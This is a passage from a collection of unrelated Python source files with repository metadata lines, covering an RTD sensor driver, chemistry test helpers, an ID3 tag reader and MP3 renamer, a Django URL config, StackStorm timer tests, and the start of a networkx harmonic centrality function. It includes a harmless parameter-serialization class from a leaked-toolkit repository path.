# Res_RTD = Res0 + a*Res0*T + b*Res0*T**2 # c = 0
# (c*Res0)T**4 - (c*Res0)*100*T**3
# + (b*Res0)*T**2 + (a*Res0)*T + (Res0 - Res_RTD) = 0
#
# quadratic formula:
# for 0 <= T <= 850 (degC)
temp_C = -(a*Res0) + math.sqrt(a*a*Res0*Res0 - 4*(b*Res0)*(Res0 - Res_RTD))
temp_C = temp_C / (2*(b*Res0))
temp_C_line = (RTD_ADC_Code/32.0) - 256.0
# removing numpy.roots will greatly speed things up
#temp_C_numpy = numpy.roots([c*Res0, -c*Res0*100, b*Res0, a*Res0, (Res0 - Res_RTD)])
#temp_C_numpy = abs(temp_C_numpy[-1])
#print "Straight Line Approx. Temp: %f degC" % temp_C_line
#print "Callendar-Van Dusen Temp (degC > 0): %f degC" % temp_C
#print "Solving Full Callendar-Van Dusen using numpy: %f" % temp_C_numpy
if (temp_C < 0): #use straight line approximation if less than 0
return temp_C_line
else:
return temp_C
def c_to_f(c_temp):
return c_temp * 9.0/5.0 + 32.0
class FaultError(Exception):
pass
if __name__ == "__main__":
import max31865
csPin = 8
misoPin = 9
mosiPin = 10
clkPin = 11
max = max31865.max31865(csPin,misoPin,mosiPin,clkPin)
max.setCal(95.104980, 127.539062)
try:
while True:
tempC = max.readTemp()
print("Temp is %f degrees C (%f F)"%(tempC, c_to_f(tempC)))
finally:
GPIO.cleanup()
| jwalthour/sensors | Pi/Python/max31865.py | Python | mit | 7,725 |
import numpy as np
from scipy.spatial.transform import Rotation
from pysisyphus.helpers import align_coords, geom_loader
from pysisyphus.interpolate import interpolate
def get_geoms(translate=0., euler=None):
geom = geom_loader("lib:benzene.xyz")
geom_mod = geom.copy()
geom_mod.coords += translate
mod = geom_mod.coords
if euler:
rot = Rotation.from_euler("XYZ", euler, degrees=True)
rot_mat = rot.as_matrix()
mod = np.array([c.dot(rot_mat) for c in mod.reshape(-1, 3)])
geom_mod.coords = mod.flatten()
return (geom, geom_mod)
def test_align_coords_trans():
geoms = get_geoms(translate=5.)
all_coords = [geom.coords for geom in geoms]
aligned = align_coords(all_coords)
np.testing.assert_allclose(aligned[0], aligned[1])
def test_align_coords_trans_rot():
geoms = get_geoms(translate=5., euler=(90, 45, 17))
all_coords = [geom.coords for geom in geoms]
aligned = align_coords(all_coords)
np.testing.assert_allclose(aligned[0], aligned[1])
def test_align_coords_trans_rot_3d():
geoms = get_geoms(translate=5., euler=(90, 45, 17))
all_coords = [geom.coords3d for geom in geoms]
aligned = align_coords(all_coords)
np.testing.assert_allclose(aligned[0], aligned[1])
def test_align_coords_interpolate():
geoms = get_geoms(translate=5., euler=(0., 0., 90.))
interpolated = interpolate(*geoms, 10, kind="lst")
all_coords = [geom.coords for geom in interpolated]
aligned = align_coords(all_coords)
# from pysisyphus.xyzloader import coords_to_trj
# trj_fn = "interpol.trj"
# atoms = geoms[0].atoms
# coords_to_trj("interpol.trj", atoms, all_coords)
# trj_fn = "aligned.trj"
# coords_to_trj("aligned.trj", atoms, aligned)
np.testing.assert_allclose(aligned[0], aligned[-1], atol=1e-10)
| eljost/pysisyphus | tests/test_helpers/test_helpers.py | Python | gpl-3.0 | 1,842 |
""" Read ID3 tags from a file.
Ned Batchelder, http://nedbatchelder.com/code/modules/id3reader.html
http://nedbatchelder.com/code/modules/id3reader.py
* original code modified by ccpizza: added code to main method to rename
files in current folder from ID3 tags,
e.g. 'Track_01.mp3' >> '01 - Chan chan.mp3'
* added safe console printing of unicode characters
* added indexing for duplicate file names, i.e. '01 - Chan
chan.mp3[2]'
* fixed indexing for duplicated ID3 tags
* added -d option to create "artist\album" directories:
e.g. 'Track_01.mp3' >> 'Compay Segundo\Mojito\01 - Chan chan.mp3'
* added fallback to 'latin1' in case of non-unicode tag text
"""
__version__ = '1.53.20070415' # History at the end of the file.
# ID3 specs: http://www.id3.org/develop.html
import struct, sys, zlib
import re
MP3=u'mp3'
# These are the text encodings, indexed by the first byte of a text value.
_encodings = ['iso8859-1', 'utf-16', 'utf-16be', 'utf-8']
# Simple pseudo-id's, mapped to their various representations.
# Use these ids with getValue, and you don't need to know what
# version of ID3 the file contains.
_simpleDataMapping = {
'album': ('TALB', 'TAL', 'v1album', 'TOAL'),
'performer': ('TPE1', 'TP1', 'v1performer', 'TOPE'),
'title': ('TIT2', 'TT2', 'v1title'),
'track': ('TRCK', 'TRK', 'v1track'),
'year': ('TYER', 'TYE', 'v1year'),
'genre': ('TCON', 'TCO', 'v1genre'),
'comment': ('COMM', 'COM', 'v1comment'),
}
# Provide booleans for older Pythons.
try:
True, False
except NameError:
True, False = 1==1, 1==0
# Tracing
_t = False
def _trace(msg):
print msg
# Coverage
_c = False
_features = {}
def _coverage(feat):
#if _t: _trace('feature '+feat)
_features[feat] = _features.setdefault(feat, 0)+1
def _safestr(s):
""" Get a good string for printing, that won't throw exceptions,
no matter what's in it.
"""
try:
return unicode(s).encode(sys.getdefaultencoding())
except UnicodeError:
return '?: '+repr(s)
# Can I just say that I think the whole concept of genres is bogus,
# since they are so subjective? And the idea of letting someone else pick
# one of these things and then have it affect the categorization of my music
# is extra bogus. And the list itself is absurd. Polsk Punk?
_genres = [
# 0-19
'Blues', 'Classic Rock', 'Country', 'Dance', 'Disco', 'Funk', 'Grunge', 'Hip - Hop', 'Jazz', 'Metal',
'New Age', 'Oldies', 'Other', 'Pop', 'R&B', 'Rap', 'Reggae', 'Rock', 'Techno', 'Industrial',
# 20-39
'Alternative', 'Ska', 'Death Metal', 'Pranks', 'Soundtrack', 'Euro - Techno', 'Ambient', 'Trip - Hop', 'Vocal', 'Jazz + Funk',
'Fusion', 'Trance', 'Classical', 'Instrumental', 'Acid', 'House', 'Game', 'Sound Clip', 'Gospel', 'Noise',
# 40-59
'Alt Rock', 'Bass', 'Soul', 'Punk', 'Space', 'Meditative', 'Instrumental Pop', 'Instrumental Rock', 'Ethnic', 'Gothic',
'Darkwave', 'Techno - Industrial', 'Electronic', 'Pop - Folk', 'Eurodance', 'Dream', 'Southern Rock', 'Comedy', 'Cult', 'Gangsta Rap',
# 60-79
'Top 40', 'Christian Rap', 'Pop / Funk', 'Jungle', 'Native American', 'Cabaret', 'New Wave', 'Psychedelic', 'Rave', 'Showtunes',
'Trailer', 'Lo - Fi', 'Tribal', 'Acid Punk', 'Acid Jazz', 'Polka', 'Retro', 'Musical', 'Rock & Roll', 'Hard Rock',
# 80-99
'Folk', 'Folk / Rock', 'National Folk', 'Swing', 'Fast - Fusion', 'Bebob', 'Latin', 'Revival', 'Celtic', 'Bluegrass',
'Avantgarde', 'Gothic Rock', 'Progressive Rock', 'Psychedelic Rock', 'Symphonic Rock', 'Slow Rock', 'Big Band', 'Chorus', 'Easy Listening', 'Acoustic',
# 100-119
'Humour', 'Speech', 'Chanson', 'Opera', 'Chamber Music', 'Sonata', 'Symphony', 'Booty Bass', 'Primus', 'Porn Groove',
'Satire', 'Slow Jam', 'Club', 'Tango', 'Samba', 'Folklore', 'Ballad', 'Power Ballad', 'Rhythmic Soul', 'Freestyle',
# 120-139
'Duet', 'Punk Rock', 'Drum Solo', 'A Cappella', 'Euro - House', 'Dance Hall', 'Goa', 'Drum & Bass', 'Club - House', 'Hardcore',
'Terror', 'Indie', 'BritPop', 'Negerpunk', 'Polsk Punk', 'Beat', 'Christian Gangsta Rap', 'Heavy Metal', 'Black Metal', 'Crossover',
# 140-147
'Contemporary Christian', 'Christian Rock', 'Merengue', 'Salsa', 'Thrash Metal', 'Anime', 'JPop', 'Synthpop'
]
class Id3Error(Exception):
""" An exception caused by id3reader properly handling a bad ID3 tag.
"""
pass
class _Header:
""" Represent the ID3 header in a tag.
"""
def __init__(self):
self.majorVersion = 0
self.revision = 0
self.flags = 0
self.size = 0
self.bUnsynchronized = False
self.bExperimental = False
self.bFooter = False
def __str__(self):
return str(self.__dict__)
class _Frame:
""" Represent an ID3 frame in a tag.
"""
def __init__(self):
self.id = ''
self.size = 0
self.flags = 0
self.rawData = ''
self.bTagAlterPreserve = False
self.bFileAlterPreserve = False
self.bReadOnly = False
self.bCompressed = False
self.bEncrypted = False
self.bInGroup = False
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return str(self.__dict__)
def _interpret(self):
""" Examine self.rawData and create a self.value from it.
"""
if len(self.rawData) == 0:
# This is counter to the spec, but seems harmless enough.
#if _c: _coverage('zero data')
return
if self.bCompressed:
# Decompress the compressed data.
self.rawData = zlib.decompress(self.rawData)
if self.id[0] == 'T':
# Text fields start with T
encoding = ord(self.rawData[0])
if 0 <= encoding < len(_encodings):
#if _c: _coverage('encoding%d' % encoding)
value = self.rawData[1:].decode(_encodings[encoding])
else:
#if _c: _coverage('bad encoding')
value = self.rawData[1:]
# Don't let trailing zero bytes fool you.
if value:
value = value.strip('\0')
# The value can actually be a list.
if '\0' in value:
value = value.split('\0')
#if _c: _coverage('textlist')
self.value = value
elif self.id[0] == 'W':
# URL fields start with W
self.value = self.rawData.strip('\0')
if self.id == 'WXXX':
self.value = self.value.split('\0')
elif self.id == 'CDM':
# ID3v2.2.1 Compressed Data Metaframe
if self.rawData[0] == 'z':
self.rawData = zlib.decompress(self.rawData[5:])
else:
#if _c: _coverage('badcdm!')
raise Id3Error, 'Unknown CDM compression: %02x' % self.rawData[0]
#@TODO: re-interpret the decompressed frame.
elif self.id in _simpleDataMapping['comment']:
# comment field
# In limited testing a typical comment looks like
# '\x00XXXID3v1 Comment\x00comment test' so in this
# case we need to find the second \x00 to know where
# where we start for a comment. In case we only find
# one \x00, lets just start at the beginning for the
# value
s = str(self.rawData)
pos = 0
count = 0
while pos < len(s) and count < 2:
if ord(s[pos]) == 0:
count = count + 1
pos = pos + 1
if count < 2:
pos = 1
if pos > 0 and pos < len(s):
s = s[pos:]
if ord(s[-1]) == 0:
s = s[:-1]
self.value = s
class Reader:
""" An ID3 reader.
Create one on a file object, and then use getValue('TIT2') (for example)
to pull values.
"""
def __init__(self, file):
""" Create a reader from a file or filename. """
self.file = file
self.header = None
self.frames = {}
self.allFrames = []
self.bytesLeft = 0
self.padbytes = ''
bCloseFile = False
# If self.file is a string of some sort, then open it to get a file.
if isinstance(self.file, (type(''), type(u''))):
self.file = open(self.file, 'rb')
bCloseFile = True
self._readId3()
if bCloseFile:
self.file.close()
def _readBytes(self, num, desc=''):
""" Read some bytes from the file.
This method implements the "unsynchronization" scheme,
where 0xFF bytes may have had 0x00 bytes stuffed after
them. These zero bytes have to be removed transparently.
"""
#if _t: _trace("ask %d (%s)" % (num,desc))
if num > self.bytesLeft:
#if _c: _coverage('long!')
raise Id3Error, 'Long read (%s): (%d > %d)' % (desc, num, self.bytesLeft)
bytes = self.file.read(num)
self.bytesLeft -= num
if len(bytes) < num:
#if _t: _trace("short read with %d left, %d total" % (self.bytesLeft, self.header.size))
#if _c: _coverage('short!')
raise Id3Error, 'Short read (%s): (%d < %d)' % (desc, len(bytes), num)
if self.header.bUnsynchronized:
nUnsync = 0
i = 0
while True:
i = bytes.find('\xFF\x00', i)
if i == -1:
break
#if _t: _trace("unsync at %d" % (i+1))
#if _c: _coverage('unsyncbyte')
nUnsync += 1
# This is a stuffed byte to remove
bytes = bytes[:i+1] + bytes[i+2:]
# Have to read one more byte from the file to adjust
bytes += self.file.read(1)
self.bytesLeft -= 1
i += 1
#if _t: _trace("unsync'ed %d" % (nUnsync))
return bytes
def _unreadBytes(self, num):
self.file.seek(-num, 1)
self.bytesLeft += num
def _getSyncSafeInt(self, bytes):
assert len(bytes) == 4
if type(bytes) == type(''):
bytes = [ ord(c) for c in bytes ]
return (bytes[0] << 21) + (bytes[1] << 14) + (bytes[2] << 7) + bytes[3]
def _getInteger(self, bytes):
i = 0;
if type(bytes) == type(''):
bytes = [ ord(c) for c in bytes ]
for b in bytes:
i = i*256+b
return i
def _addV1Frame(self, id, rawData):
if id == 'v1genre':
assert len(rawData) == 1
nGenre = ord(rawData)
try:
value = _genres[nGenre]
except IndexError:
value = "(%d)" % nGenre
else:
value = rawData.strip(' \t\r\n').split('\0')[0]
if value:
frame = _Frame()
frame.id = id
frame.rawData = rawData
frame.value = value
self.frames[id] = frame
self.allFrames.append(frame)
def _pass(self):
""" Do nothing, for when we need to plug in a no-op function.
"""
pass
def _readId3(self):
header = self.file.read(10)
if len(header) < 10:
return
hstuff = struct.unpack('!3sBBBBBBB', header)
if hstuff[0] != "ID3":
# Doesn't look like an ID3v2 tag,
# Try reading an ID3v1 tag.
self._readId3v1()
return
self.header = _Header()
self.header.majorVersion = hstuff[1]
self.header.revision = hstuff[2]
self.header.flags = hstuff[3]
self.header.size = self._getSyncSafeInt(hstuff[4:8])
self.bytesLeft = self.header.size
self._readExtHeader = self._pass
if self.header.majorVersion == 2:
#if _c: _coverage('id3v2.2.%d' % self.header.revision)
self._readFrame = self._readFrame_rev2
elif self.header.majorVersion == 3:
#if _c: _coverage('id3v2.3.%d' % self.header.revision)
self._readFrame = self._readFrame_rev3
elif self.header.majorVersion == 4:
#if _c: _coverage('id3v2.4.%d' % self.header.revision)
self._readFrame = self._readFrame_rev4
else:
#if _c: _coverage('badmajor!')
raise Id3Error, "Unsupported major version: %d" % self.header.majorVersion
# Interpret the flags
self._interpretFlags()
# Read any extended header
self._readExtHeader()
# Read the frames
while self.bytesLeft > 0:
frame = self._readFrame()
if frame:
frame._interpret()
self.frames[frame.id] = frame
self.allFrames.append(frame)
else:
#if _c: _coverage('padding')
break
def _interpretFlags(self):
""" Interpret ID3v2.x flags.
"""
if self.header.flags & 0x80:
self.header.bUnsynchronized = True
#if _c: _coverage('unsynctag')
if self.header.majorVersion == 2:
if self.header.flags & 0x40:
#if _c: _coverage('compressed')
# "Since no compression scheme has been decided yet,
# the ID3 decoder (for now) should just ignore the entire
# tag if the compression bit is set."
self.header.bCompressed = True
if self.header.majorVersion >= 3:
if self.header.flags & 0x40:
#if _c: _coverage('extheader')
if self.header.majorVersion == 3:
self._readExtHeader = self._readExtHeader_rev3
else:
self._readExtHeader = self._readExtHeader_rev4
if self.header.flags & 0x20:
#if _c: _coverage('experimental')
self.header.bExperimental = True
if self.header.majorVersion >= 4:
if self.header.flags & 0x10:
#if _c: _coverage('footer')
self.header.bFooter = True
def _readExtHeader_rev3(self):
""" Read the ID3v2.3 extended header.
"""
# We don't interpret this yet, just eat the bytes.
size = self._getInteger(self._readBytes(4, 'rev3ehlen'))
self._readBytes(size, 'rev3ehdata')
def _readExtHeader_rev4(self):
""" Read the ID3v2.4 extended header.
"""
# We don't interpret this yet, just eat the bytes.
size = self._getSyncSafeInt(self._readBytes(4, 'rev4ehlen'))
self._readBytes(size-4, 'rev4ehdata')
def _readId3v1(self):
""" Read the ID3v1 tag.
spec: http://www.id3.org/id3v1.html
"""
self.file.seek(-128, 2)
tag = self.file.read(128)
if len(tag) != 128:
return
if tag[0:3] != 'TAG':
return
self.header = _Header()
self.header.majorVersion = 1
self.header.revision = 0
self._addV1Frame('v1title', tag[3:33])
self._addV1Frame('v1performer', tag[33:63])
self._addV1Frame('v1album', tag[63:93])
self._addV1Frame('v1year', tag[93:97])
self._addV1Frame('v1comment', tag[97:127])
self._addV1Frame('v1genre', tag[127])
if tag[125] == '\0' and tag[126] != '\0':
#if _c: _coverage('id3v1.1')
self.header.revision = 1
self._addV1Frame('v1track', str(ord(tag[126])))
else:
#if _c: _coverage('id3v1.0')
pass
return
_validIdChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
def _isValidId(self, id):
""" Determine if the id bytes make a valid ID3 id.
"""
for c in id:
if not c in self._validIdChars:
#if _c: _coverage('bad id')
return False
#if _c: _coverage('id '+id)
return True
def _readFrame_rev2(self):
""" Read a frame for ID3v2.2: three-byte ids and lengths.
spec: http://www.id3.org/id3v2-00.txt
"""
if self.bytesLeft < 6:
return None
id = self._readBytes(3, 'rev2id')
if len(id) < 3 or not self._isValidId(id):
self._unreadBytes(len(id))
return None
hstuff = struct.unpack('!BBB', self._readBytes(3, 'rev2len'))
frame = _Frame()
frame.id = id
frame.size = self._getInteger(hstuff[0:3])
frame.rawData = self._readBytes(frame.size, 'rev2data')
return frame
def _readFrame_rev3(self):
""" Read a frame for ID3v2.3: four-byte ids and lengths.
"""
if self.bytesLeft < 10:
return None
id = self._readBytes(4,'rev3id')
if len(id) < 4 or not self._isValidId(id):
self._unreadBytes(len(id))
return None
hstuff = struct.unpack('!BBBBh', self._readBytes(6,'rev3head'))
frame = _Frame()
frame.id = id
frame.size = self._getInteger(hstuff[0:4])
cbData = frame.size
frame.flags = hstuff[4]
#if _t: _trace('flags = %x' % frame.flags)
frame.bTagAlterPreserve = (frame.flags & 0x8000 != 0)
frame.bFileAlterPreserve = (frame.flags & 0x4000 != 0)
frame.bReadOnly = (frame.flags & 0x2000 != 0)
frame.bCompressed = (frame.flags & 0x0080 != 0)
if frame.bCompressed:
frame.decompressedSize = self._getInteger(self._readBytes(4, 'decompsize'))
cbData -= 4
#if _c: _coverage('compress')
frame.bEncrypted = (frame.flags & 0x0040 != 0)
if frame.bEncrypted:
frame.encryptionMethod = self._readBytes(1, 'encrmethod')
cbData -= 1
#if _c: _coverage('encrypt')
frame.bInGroup = (frame.flags & 0x0020 != 0)
if frame.bInGroup:
frame.groupid = self._readBytes(1, 'groupid')
cbData -= 1
#if _c: _coverage('groupid')
frame.rawData = self._readBytes(cbData, 'rev3data')
return frame
def _readFrame_rev4(self):
""" Read a frame for ID3v2.4: four-byte ids and lengths.
"""
if self.bytesLeft < 10:
return None
id = self._readBytes(4,'rev4id')
if len(id) < 4 or not self._isValidId(id):
self._unreadBytes(len(id))
return None
hstuff = struct.unpack('!BBBBh', self._readBytes(6,'rev4head'))
frame = _Frame()
frame.id = id
frame.size = self._getSyncSafeInt(hstuff[0:4])
cbData = frame.size
frame.flags = hstuff[4]
frame.bTagAlterPreserve = (frame.flags & 0x4000 != 0)
frame.bFileAlterPreserve = (frame.flags & 0x2000 != 0)
frame.bReadOnly = (frame.flags & 0x1000 != 0)
frame.bInGroup = (frame.flags & 0x0040 != 0)
if frame.bInGroup:
frame.groupid = self._readBytes(1, 'groupid')
cbData -= 1
#if _c: _coverage('groupid')
frame.bCompressed = (frame.flags & 0x0008 != 0)
if frame.bCompressed:
#if _c: _coverage('compress')
pass
frame.bEncrypted = (frame.flags & 0x0004 != 0)
if frame.bEncrypted:
frame.encryptionMethod = self._readBytes(1, 'encrmethod')
cbData -= 1
#if _c: _coverage('encrypt')
frame.bUnsynchronized = (frame.flags & 0x0002 != 0)
if frame.bUnsynchronized:
#if _c: _coverage('unsyncframe')
pass
if frame.flags & 0x0001:
frame.datalen = self._getSyncSafeInt(self._readBytes(4, 'datalen'))
cbData -= 4
#if _c: _coverage('datalenindic')
frame.rawData = self._readBytes(cbData, 'rev3data')
return frame
def getValue(self, id):
""" Return the value for an ID3 tag id, or for a
convenience label ('title', 'performer', ...),
or return None if there is no such value.
"""
if self.frames.has_key(id):
if hasattr(self.frames[id], 'value'):
return self.frames[id].value
if _simpleDataMapping.has_key(id):
for id2 in _simpleDataMapping[id]:
v = self.getValue(id2)
if v:
return v
return None
def getRawData(self, id):
if self.frames.has_key(id):
return self.frames[id].rawData
return None
def dump(self):
import pprint
print "Header:"
print self.header
print "Frames:"
for fr in self.allFrames:
if len(fr.rawData) > 30:
fr.rawData = fr.rawData[:30]
pprint.pprint(self.allFrames)
for fr in self.allFrames:
if hasattr(fr, 'value'):
print '%s: %s' % (fr.id, _safestr(fr.value))
else:
print '%s= %s' % (fr.id, _safestr(fr.rawData))
for label in _simpleDataMapping.keys():
v = self.getValue(label)
if v:
print 'Label %s: %s' % (label, _safestr(v))
def dumpCoverage(self):
feats = _features.keys()
feats.sort()
for feat in feats:
print "Feature %-12s: %d" % (feat, _features[feat])
# chars not allowed in filenames
illegal_chars = u'/\?=+<>:;"*|!@#$%^&*'
# http://code.activestate.com/recipes/65441/
def has_chars(raw, bad_chars):
try:
for c in bad_chars:
if c in raw: return True
return False
except UnicodeDecodeError:
return False
def replace_illegal_chars(raw):
return ''.join([c in illegal_chars and '_' or c for c in raw])
def asci(*args):
for arg in args:
print arg.encode('us-ascii','xmlcharrefreplace'),
print
def is_dupe(oldmp3, newmp3):
#return bool(re.search(u'^'+orig+ r'(\[\d+\])?$', new))
old=os.path.splitext(oldmp3)[0]
new=os.path.splitext(newmp3)[0]
return old.lower().startswith(new.lower())
def parse_index(f):
rx = re.compile('(?P<name>.+)\[(?P<index>\d+?)\]$')
mo = rx.search(f)
if mo:
return mo.group('name'), mo.group('index')
else:
return f, 0
if __name__ == '__main__':
import os
import optparse
dodirs = False
parser = optparse.OptionParser()
parser.add_option('-l','--list',
action="store_true",
help='List ID3 tags only with no renaming',
default=False
)
parser.add_option('-d', '--dirs',
action="store_true",
help="create album dirs",
default=False)
(opts, args) = parser.parse_args(sys.argv[1:])
if len(args):
mp3dir = unicode(args[0])
else:
mp3dir = u'.'
print
if opts.list:
print 'Listing ID3 tags in folder:', asci(os.path.abspath(mp3dir))
else:
print 'Renaming MP3 files in folder:', asci(os.path.abspath(mp3dir))
print
for fname in os.listdir(mp3dir):
# uncomment if you want to process only files with .mp3 extension
# if not fname.lower().endswith(MP3):
# continue
if os.path.isdir(fname):
continue
absfname = os.path.join(mp3dir, fname)
try:
id3r = Reader(absfname)
except (Id3Error, UnicodeDecodeError), e:
print e
continue
#id3r.dump()
album = id3r.getValue('album')
track = id3r.getValue('track')
artist = id3r.getValue('performer')
title = id3r.getValue('title')
year = id3r.getValue('year')
### move files to dirs according to artist, album
if opts.dirs and artist and album:
dodirs = True
mp3dir_full = os.path.join(mp3dir,
replace_illegal_chars(artist),
replace_illegal_chars(album))
if not os.path.exists(mp3dir_full):
try:
os.makedirs(mp3dir_full)
except (IOError,WindowsError), e :
print
else:
mp3dir_full = mp3dir
if not title:
continue
# replace tracks like '2/15' >> '02'
if track and u'/' in track:
track = track.split('/')[0]
if track:
track = track.zfill(2) # zero fill, i. e. '1' >> '01'
if not track:
track = ''
if has_chars(title, illegal_chars):
title = replace_illegal_chars(title)
try:
if isinstance(track, unicode) or isinstance(title, unicode):
new_fname = track + u' - ' + title + u'.' + MP3
## try to fix non-unicode strings, only trying 'latin1'
if isinstance(track, str) or isinstance(title, str):
new_fname = track + ' - ' + title.decode('latin1') + '.' + MP3
except UnicodeDecodeError:
print 'Encoding error while processing title/track'
continue
new_dir = dodirs and mp3dir_full or mp3dir
proposed_new_name = os.path.join(new_dir, new_fname)
maxwidth = 35
if opts.list:
print '>',
else:
if not is_dupe(absfname, proposed_new_name):
if os.path.exists(proposed_new_name):
for i in range(1,1000): # max 200 duplicates
parsed_name, idx = parse_index(os.path.splitext(proposed_new_name)[0])
new_fname = parsed_name + u'[' + unicode(idx+i) + u'].' + MP3
if not os.path.exists(new_fname):
break
try:
os.rename(absfname, os.path.join(new_dir, new_fname))
except Exception, e:
asci( 'Error: ', absfname.ljust(maxwidth), '>>>', proposed_new_name, str(e) )
else:
maxwidth -= len('Skipping...') + 1
print 'Skipping...',
asci((len(fname) > maxwidth and fname[:maxwidth-3] or fname).ljust(maxwidth), ' >>> ', new_fname)
| ActiveState/code | recipes/Python/576811_Rename_MP3_files_ID3_tags_does_not_require/recipe-576811.py | Python | mit | 26,410 |
# -*- coding: utf-8 -*-
"""
Run cross-validation analysis
@author: Yuriy Sverchkov (yuriy.sverchkov@wisc.edu)
"""
from sys import argv
from pandas import read_csv
from analysis_pipeline import run_analysis_pipeline
if __name__ == '__main__':
training_filename = argv[1]
panel_size = int(argv[2])
pickled_filename = argv[3]
data = read_csv(training_filename)
result = run_analysis_pipeline(
data = data,
panel_size = panel_size,
output_file_name = pickled_filename
)
| sverchkov/ivancic-panel-selection | python/run_cv_analysis.py | Python | mit | 531 |
from django.conf import settings
from django.conf.urls.static import static
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {
'document_root': settings.MEDIA_ROOT,
}),
url(r'^', include('wallfly.urls')),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| trcm/sacerdos | sacerdos/urls.py | Python | mit | 557 |
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: type_Params.py
from types import *
class Params:
def __init__(self):
self.__dict__['maxPorts'] = 500
self.__dict__['memory'] = 256000
def __getattr__(self, name):
if name == 'maxPorts':
return self.__dict__['maxPorts']
if name == 'memory':
return self.__dict__['memory']
raise AttributeError("Attribute '%s' not found" % name)
def __setattr__(self, name, value):
if name == 'maxPorts':
self.__dict__['maxPorts'] = value
elif name == 'memory':
self.__dict__['memory'] = value
else:
raise AttributeError("Attribute '%s' not found" % name)
def Marshal(self, mmsg):
from mcl.object.Message import MarshalMessage
submsg = MarshalMessage()
submsg.AddU32(MSG_KEY_PARAMS_MAX_PORTS, self.__dict__['maxPorts'])
submsg.AddU32(MSG_KEY_PARAMS_MEMORY, self.__dict__['memory'])
mmsg.AddMessage(MSG_KEY_PARAMS, submsg)
def Demarshal(self, dmsg, instance=-1):
import mcl.object.Message
msgData = dmsg.FindData(MSG_KEY_PARAMS, mcl.object.Message.MSG_TYPE_MSG, instance)
submsg = mcl.object.Message.DemarshalMessage(msgData)
try:
self.__dict__['maxPorts'] = submsg.FindU32(MSG_KEY_PARAMS_MAX_PORTS)
except:
pass
try:
self.__dict__['memory'] = submsg.FindU32(MSG_KEY_PARAMS_MEMORY)
except:
pass | DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/mca/network/cmd/portmap/type_Params.py | Python | unlicense | 1,640 |
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import bson
import mock
from st2common.constants.triggers import TIMER_TRIGGER_TYPES
from st2common.models.db.trigger import TriggerDB
from st2common.models.system.common import ResourceReference
from st2common.persistence.trigger import TriggerType
from st2common.persistence.trigger import Trigger
from st2reactor.timer.base import St2Timer
from st2tests.base import CleanDbTestCase
class St2TimerTestCase(CleanDbTestCase):
def test_trigger_types_are_registered_on_start(self):
timer = St2Timer()
timer._scheduler = mock.Mock()
# Verify there are no TriggerType in the db when we start
self.assertItemsEqual(TriggerType.get_all(), [])
timer.start()
# Verify TriggerType objects have been created
trigger_type_dbs = TriggerType.get_all()
self.assertEqual(len(trigger_type_dbs), len(TIMER_TRIGGER_TYPES))
timer_trigger_type_refs = TIMER_TRIGGER_TYPES.keys()
for trigger_type in trigger_type_dbs:
ref = ResourceReference(pack=trigger_type.pack, name=trigger_type.name).ref
self.assertTrue(ref in timer_trigger_type_refs)
def test_existing_rules_are_loaded_on_start(self):
# Assert that we dispatch message for every existing Trigger object
St2Timer._handle_create_trigger = mock.Mock()
timer = St2Timer()
timer._scheduler = mock.Mock()
timer._trigger_watcher.run = mock.Mock()
# Verify there are no Trigger and TriggerType in the db wh:w
self.assertItemsEqual(Trigger.get_all(), [])
self.assertItemsEqual(TriggerType.get_all(), [])
# Add a dummy timer Trigger object
type_ = TIMER_TRIGGER_TYPES.keys()[0]
parameters = {'unit': 'seconds', 'delta': 1000}
trigger_db = TriggerDB(id=bson.ObjectId(), name='test_trigger_1', pack='dummy',
type=type_, parameters=parameters)
trigger_db = Trigger.add_or_update(trigger_db)
# Verify object has been added
self.assertEqual(len(Trigger.get_all()), 1)
timer.start()
timer._trigger_watcher._load_thread.wait()
# Verify handlers are called
timer._handle_create_trigger.assert_called_with(trigger_db)
@mock.patch('st2common.transport.reactor.TriggerDispatcher.dispatch')
def test_timer_trace_tag_creation(self, dispatch_mock):
timer = St2Timer()
timer._scheduler = mock.Mock()
timer._trigger_watcher = mock.Mock()
# Add a dummy timer Trigger object
type_ = TIMER_TRIGGER_TYPES.keys()[0]
parameters = {'unit': 'seconds', 'delta': 1}
trigger_db = TriggerDB(name='test_trigger_1', pack='dummy', type=type_,
parameters=parameters)
timer.add_trigger(trigger_db)
timer._emit_trigger_instance(trigger=trigger_db.to_serializable_dict())
self.assertEqual(dispatch_mock.call_args[1]['trace_context'].trace_tag,
'%s-%s' % (TIMER_TRIGGER_TYPES[type_]['name'], trigger_db.name))
| punalpatel/st2 | st2reactor/tests/unit/test_timer.py | Python | apache-2.0 | 3,837 |
# Copyright (C) 2015 by
# Alessandro Luongo
# BSD license.
"""Functions for computing the harmonic centrality of a graph."""
from __future__ import division
import networkx as nx
__author__ = "\n".join(['Alessandro Luongo (alessandro.luongo@studenti.unimi.it'])
__all__ = ['harmonic_centrality']
def harmonic_centrality(G, distance=None):
r"""Compute harmonic centrality for nodes.
Harmonic centrality [1]_ of a node `u` is the sum of the reciprocal
of the shortest path distances from all other nodes to `u`
.. math::
C(u) = \sum_{v \neq u} \frac{1}{d(v, u)}
where `d(v, u)` is the shortest-path distance between `v` and `u`.
Notice that higher values indicate higher centrality.
Parameters
----------
G : graph
A NetworkX graph
distance : edge attribute key, optional (default=None)
Use the specified edge attribute as the edge distance in shortest
path calculations. If `None`, then each edge will have distance equal to 1.
Returns
-------
nodes : dictionary
Dictionary of nodes with harmonic centrality as the value.
See Also
--------
